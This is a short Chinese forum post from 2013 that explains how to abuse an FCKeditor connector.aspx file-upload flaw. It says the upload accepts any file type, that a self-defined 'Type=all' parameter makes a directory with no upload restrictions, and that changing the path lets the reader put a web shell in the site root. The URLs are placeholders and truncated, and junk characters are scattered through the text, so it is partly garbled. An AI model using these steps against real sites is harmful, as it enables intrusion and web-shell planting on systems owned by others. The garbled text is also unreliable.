出现上传漏洞的地址是:" G8 Q& h8 y. Z. r' U
http://www.xxx.com/admin/FCKedit ... aspx/connector.aspx
5 d( R. i; W* g* W3 W4 L# k) p [. q打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:: f; g/ ]' @) a* c; M9 M- o4 s) ~1 w$ e
http://www.xxx.com/UserFiles/all/1.asa9 w2 c: N; e0 X, n: i
"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
; Y. {1 |0 Y1 V8 T: |* W比如输入:
0 V& t! P7 l p2 M: Y0 xhttp://www.xxx.com/admin/FCKedit ... aspx/connector.aspx! {/ ]4 ? L, ?* ?/ F( h( C
所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了1 ?( E2 ~' S7 {/ k- I
而如果这样输入:http://www.xxx.com/admin/FCKedit ... aspx/connector.aspx- }7 p! k5 k0 z
就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了. |
发表于 2013-3-29 19:30:05
收藏
支持
反对